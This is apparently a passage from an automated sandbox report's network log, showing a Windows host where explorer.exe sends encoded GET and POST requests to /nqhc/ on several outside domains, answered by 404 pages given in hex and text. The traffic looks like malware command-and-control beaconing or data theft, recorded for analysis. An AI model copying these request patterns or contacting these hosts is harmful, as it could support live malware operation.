                                                                                                                                                                                    Data Ascii: 6x(foFmuv-4gAE9nsBEdwh0TOlUWJEb9RgVyMyVoK2N7W10LsZtQ293fQzDH7PK8CBxH4bzR8XDR~_~c12mq5etXXCJRma4mIplbb-RsywkCm9TiUc8a57M30XRy7e4YKPvVyePGmXmwYjc303hQRG6TPWxg7jzwZl1WS9e1FbfwmYpA08sy~NruM2Fk2KaoxwVYAp88pmPuOuV6q22Mc1FHiuID8yDZNSIw7rjPePwHCT8YweO
                                                                                                                                                                                    Nov 21, 2022 19:20:21.512767076 CET535OUTData Raw: 75 74 67 48 4d 71 52 52 37 55 4f 79 79 4c 71 54 6d 70 4d 57 61 4e 6d 61 36 68 45 46 6c 65 4f 4b 65 65 72 66 41 77 70 39 46 45 79 4b 59 67 30 41 38 4d 43 65 38 47 51 4c 54 55 68 49 75 47 56 77 4b 59 71 34 6a 31 33 61 51 6a 66 34 61 6d 55 51 46 6f
                                                                                                                                                                                    Data Ascii: utgHMqRR7UOyyLqTmpMWaNma6hEFleOKeerfAwp9FEyKYg0A8MCe8GQLTUhIuGVwKYq4j13aQjf4amUQFoLSiBQNuK(Dg5NJ7r5FFBl_oaWQYHHT28OVRLbFXd3CaeUtKW8Zs2tgp2m1ELFaxhHFyivOLXkU0zlFjeiLo4lXRlpz7h9vcU5jqFv-o_2YAkyN7HDon2uSkvxNCVlj2wk8bUVgPLCAMvVmKQDAQpWPgRVhTuAxABD
                                                                                                                                                                                    Nov 21, 2022 19:20:21.662648916 CET550INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: nginx-reuseport/1.21.1
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:20:21 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    Data Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    50192.168.11.2049875195.24.68.2380C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:23:01.783169031 CET1455OUTGET /nqhc/?r4txB=nxEpVeNHnARypVRSWPzq+Yc9yhVf8J7idG64BP0ay1SSlgh8opdyHa7T5FU3HpxZiEIb1VwF2iL8pFHt356/ltXz75Eg7AD5bw==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.phootka.ru
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:23:01.843957901 CET1456INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: openresty
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:23:01 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Content-Length: 39481
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55 54 46 2d 31 36 20 73 65 71 75 65 6e 63 65 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 28 28 76 61 6c 75 65 20 26 20 30 78 33 46 46 29 20 3c 3c 20 31 30 29 20 2b 20 28 65 78 74 72 61 20 26 20 30 78 33 46 46 29 20 2b 20 30 78 31 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> 404</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&amp;display=swap" rel="stylesheet"> <script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script> <script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = ((value & 0x3FF) << 10) + (extra & 0x3FF) + 0x10000; }
                                                                                                                                                                                    Nov 21, 2022 19:23:01.844044924 CET1458INData Raw: 6f 75 74 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e
                                                                                                                                                                                    Data Ascii: output.push(value); } return output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++];
                                                                                                                                                                                    Nov 21, 2022 19:23:01.844110966 CET1459INData Raw: 74 61 20 2f 20 64 61 6d 70 29 20 3a 20 28 64 65 6c 74 61 20 3e 3e 20 31 29 3b 0a 20 20 20 20 20 20 20 20 64 65 6c 74 61 20 2b 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: ta / damp) : (delta >> 1); delta += Math.floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floo
                                                                                                                                                                                    Nov 21, 2022 19:23:01.844172955 CET1460INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 20 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: throw RangeError ("punycode_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("puny
                                                                                                                                                                                    Nov 21, 2022 19:23:01.844233990 CET1462INData Raw: 30 2c 20 6c 65 6e 20 3d 20 6f 75 74 70 75 74 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: 0, len = output.length; i < len; i++) { if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.enco
                                                                                                                                                                                    Nov 21, 2022 19:23:01.844299078 CET1463INData Raw: 30 3b 20 6a 20 3c 20 69 6e 70 75 74 5f 6c 65 6e 67 74 68 3b 20 2b 2b 6a 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6a 76 20 3d 20 69 6e 70 75 74 5b 6a 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a
                                                                                                                                                                                    Data Ascii: 0; j < input_length; ++j) { ijv = input[j]; if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow
                                                                                                                                                                                    Nov 21, 2022 19:23:01.844402075 CET1464INData Raw: 6f 41 53 43 49 49 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 20 64 6f 6d 61 69 6e 20 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 20 3d 20 64 6f 6d 61 69 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: oASCII = function ( domain ) { var domain_array = domain.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za
                                                                                                                                                                                    Nov 21, 2022 19:23:01.844465971 CET1465INData Raw: 65 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 33 30 70 78 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: een; } .logo { padding: 30px 40px; } .content { display: flex; justify-content: space-between; margin: 0 82px; } .left { display: fl
                                                                                                                                                                                    Nov 21, 2022 19:23:01.844527960 CET1467INData Raw: 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20
                                                                                                                                                                                    Data Ascii: : 15px; } } </style></head><body><header> <div class="logo"> <a href="https://www.nic.ru/"> <svg width="100" height="42" viewBox="0 0 100 42" fill="none" xmlns="http://www.w3.org/2
                                                                                                                                                                                    Nov 21, 2022 19:23:01.844592094 CET1468INData Raw: 32 30 2e 39 34 37 35 5a 22 20 66 69 6c 6c 3d 22 23 31 34 32 39 35 45 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 35 33 2e 31 35 30 39 20 31 34 2e 31 37 38 38 43 35 33 2e
                                                                                                                                                                                    Data Ascii: 20.9475Z" fill="#14295E"></path> <path d="M53.1509 14.1788C53.1695 14.0678 53.1828 13.9659 53.1923 13.8744C53.2017 13.7815 53.2065 13.6867 53.2065 13.5876C53.2065 13.1011 53.0556 12.7287 52.7556 12.47C52.455 12.211 52.0227
                                                                                                                                                                                    Nov 21, 2022 19:23:01.892462015 CET1470INData Raw: 36 34 30 35 20 31 30 2e 30 34 39 34 43 36 35 2e 39 36 37 38 20 31 30 2e 30 34 39 34 20 36 35 2e 33 35 32 31 20 31 30 2e 31 37 35 37 20 36 34 2e 37 39 32 20 31 30 2e 34 32 35 37 43 36 34 2e 32 33 31 37 20 31 30 2e 36 37 37 39 20 36 33 2e 36 31 33
                                                                                                                                                                                    Data Ascii: 6405 10.0494C65.9678 10.0494 65.3521 10.1757 64.792 10.4257C64.2317 10.6779 63.6136 11.0274 62.9346 11.475L63.2065 10.3343L58.7385 10.3351L58.2337 12.5144H59.3852L57.5098 20.6619H60.8287L62.5044 13.3418C62.9323 13.1149 63.3172 12.9453 63.6601


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    51192.168.11.2049876192.232.217.12580C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:23:07.533874989 CET1497OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.wellnessprodia.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.wellnessprodia.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.wellnessprodia.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 52 41 6f 2d 6a 64 53 6e 68 68 6a 4b 53 6d 75 33 33 41 34 61 62 6f 78 70 37 5f 53 71 58 62 32 73 76 30 37 68 28 51 77 37 70 48 77 61 6a 6b 34 71 46 68 5a 33 6e 58 43 62 79 62 6b 44 71 50 53 55 34 6a 37 57 6d 64 51 6f 6a 42 59 61 7a 70 59 75 38 72 65 43 44 75 6d 47 61 32 6b 64 79 68 78 42 47 42 34 31 5a 33 47 35 42 4b 32 42 7e 35 78 75 44 59 44 72 76 6f 47 62 47 4c 57 47 36 72 66 4c 51 46 46 32 6f 4f 46 35 75 78 45 36 77 2d 30 59 30 41 7e 34 42 58 37 43 33 68 39 38 48 6f 59 55 51 36 75 35 30 63 44 4d 45 34 55 50 6f 31 35 38 4a 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=RAo-jdSnhhjKSmu33A4aboxp7_SqXb2sv07h(Qw7pHwajk4qFhZ3nXCbybkDqPSU4j7WmdQojBYazpYu8reCDumGa2kdyhxBGB41Z3G5BK2B~5xuDYDrvoGbGLWG6rfLQFF2oOF5uxE6w-0Y0A~4BX7C3h98HoYUQ6u50cDME4UPo158Jg).
                                                                                                                                                                                    Nov 21, 2022 19:23:07.704783916 CET1498INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:23:07 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                                                    Last-Modified: Fri, 01 May 2020 23:50:34 GMT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    Content-Length: 462
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00
                                                                                                                                                                                    Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    52192.168.11.2049877192.232.217.12580C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:23:09.721041918 CET1499OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.wellnessprodia.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.wellnessprodia.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.wellnessprodia.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 52 41 6f 2d 6a 64 53 6e 68 68 6a 4b 53 48 65 33 77 6a 51 61 63 49 78 6d 69 5f 53 71 64 37 32 53 76 30 33 68 28 52 46 2d 71 78 41 61 6b 47 51 71 47 67 5a 33 33 48 43 62 35 37 6b 47 6c 76 54 59 34 6a 7e 68 6d 66 55 6f 6a 42 38 61 79 59 34 75 7e 62 65 42 49 4f 6d 42 5a 32 6b 41 32 68 78 78 47 47 77 54 5a 32 53 35 41 37 71 42 28 37 5a 75 56 64 6a 6f 34 49 47 64 45 4c 57 42 7a 4c 66 5f 51 46 49 4c 6f 50 74 48 75 48 30 36 77 66 59 59 31 41 7e 37 4c 6e 37 5a 71 78 38 43 4e 4c 41 59 61 4a 4c 62 6b 38 54 77 50 37 39 48 6f 78 6f 62 57 71 72 49 57 62 38 63 63 49 34 51 37 49 31 7a 79 72 67 6c 47 68 41 41 46 4f 49 75 66 31 6b 36 7e 4a 4c 49 4a 6d 45 7a 73 43 6b 5a 4f 38 6d 51 7e 79 66 68 6f 50 30 6f 39 37 6c 7a 34 58 63 4b 55 76 6b 62 46 43 4c 77 33 4b 52 74 45 2d 32 4e 64 5f 78 58 75 79 54 62 6c 4b 4e 37 41 6b 70 56 64 39 34 5f 68 4f 51 39 48 30 44 6d 7e 62 43 43 6a 30 5a 53 6e 74 78 34 6d 76 50 41 72 58 66 65 56 33 4d 5f 33 31 4a 47 72 7a 6a 58 76 6d 4e 75 65 6d 61 62 53 44 55 6a 33 77 4b 56 45 58 42 42 51 4a 7a 47 7a 51 77 48 4c 47 74 45 44 47 63 6b 4d 5a 6c 4a 6d 70 4c 68 6f 37 65 73 67 5f 62 56 4b 4c 54 4c 6f 62 58 36 46 77 70 6a 68 4d 49 52 78 32 4f 6d 32 5f 58 47 74 71 6a 31 67 5a 42 6c 4f 39 33 74 31 71 72 53 58 67 66 69 6b 73 50 4b 6a 62 53 44 68 48 62 51 47 55 4d 46 51 38 5a 6c 4b 6f 6f 78 31 6f 68 5f 4e 63 6d 52 48 37 6d 38 58 67 75 61 4b 64 63 46 6a 42 36 48 37 35 5a 4f 69 61 56 59 75 38 33 74 46 74 4d 30 55 34 41 67 33 6c 4f 72 75 62 54 35 73 4a 75 58 6f 37 74 6e 33 62 4c 79 78 48 43 36 67 53 63 39 70 4b 43 42 67 35 76 73 62 4c 38 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=RAo-jdSnhhjKSHe3wjQacIxmi_Sqd72Sv03h(RF-qxAakGQqGgZ33HCb57kGlvTY4j~hmfUojB8ayY4u~beBIOmBZ2kA2hxxGGwTZ2S5A7qB(7ZuVdjo4IGdELWBzLf_QFILoPtHuH06wfYY1A~7Ln7Zqx8CNLAYaJLbk8TwP79HoxobWqrIWb8ccI4Q7I1zyrglGhAAFOIuf1k6~JLIJmEzsCkZO8mQ~yfhoP0o97lz4XcKUvkbFCLw3KRtE-2Nd_xXuyTblKN7AkpVd94_hOQ9H0Dm~bCCj0ZSntx4mvPArXfeV3M_31JGrzjXvmNuemabSDUj3wKVEXBBQJzGzQwHLGtEDGckMZlJmpLho7esg_bVKLTLobX6FwpjhMIRx2Om2_XGtqj1gZBlO93t1qrSXgfiksPKjbSDhHbQGUMFQ8ZlKoox1oh_NcmRH7m8XguaKdcFjB6H75ZOiaVYu83tFtM0U4Ag3lOrubT5sJuXo7tn3bLyxHC6gSc9pKCBg5vsbL8.
                                                                                                                                                                                    Nov 21, 2022 19:23:09.892344952 CET1500INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:23:09 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                                                    Last-Modified: Fri, 01 May 2020 23:50:34 GMT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    Content-Length: 462
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00
